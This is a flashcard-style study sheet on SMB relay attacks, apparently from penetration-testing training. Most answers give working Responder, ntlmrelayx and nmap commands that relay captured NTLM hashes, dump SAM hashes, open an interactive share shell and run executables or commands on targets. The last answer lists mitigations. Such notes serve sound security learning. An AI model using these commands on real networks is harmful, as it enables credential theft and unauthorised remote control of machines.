SMB Relay

Question 1

What is SMB relay ?
What are the requirements ?

Answer 1

Instead of cracking hashes gathered with Responder, relay thise hashes to specific machines and potentially get access

Requirements:
1. SMB signing must be disabled on the target
2. Relayed user credentials must be admin on the target machine

Question 2

How set up SMB relay attack ?

Answer 2

1. Edit /etc/responder/Responder.conf to set SMB server and HTTP server Off
2. Run responder: python Responder.py -I tun0 -rdwv
3. Set up your relay: python ntlmrelayx.py -tf targets.txt -smb2support
4. An event occurs
5. Get SAM hashes of local users of the targets

Question 3

Find targets that has SMB signin desactivated and exploit it

Answer 3

1. nmap –script=smb2-security-mode.nse -p445 CIDR_Network
2. Take the list of all host that enable SMB signing but not required
3. Run the relay attack

Question 4

Get interractive shell with SMB relay attacks

Answer 4

1. Run responder with SMB and HTTP server off
2. Run ntlmrelayx.py -tf targets.txt -i
3. Connect local session opened: nc 127.0.0.1 11000
4. shares
   use C$
   use ADMIN$
   ls
   You got all control on the machine

Question 5

Get interractive meterpreter shell with SMB relay attacks

Answer 5

ntlmrelayx.py -tf targets.txt -smb2support -e executableName.exe

Question 6

Get running command with SMB relay attacks

Answer 6

ntlmrelayx.py -tf targets.txt -smb2support -c “commandToRun”

Question 7

Mitigations SMB relay attack

Answer 7

1. Enable signing on all devices
   - Pro: completely stop this attacks
   - Con : Can cause performance issue with file copise
2. Disable NTLM authentification on network
   - Pro: Completely stop the attack
   - Con: If kerberos stop working, Windows defautls back to NTLM
3. Account tiering:
   - Pro: Limits domain admin to specific tasks
   - Con Enforcing the policy may be difficult
4. Local admin restriction
   - Pro: Can prevent a lot of lateral movement
   - Con: Potentiel increase in the amount of server desk tickets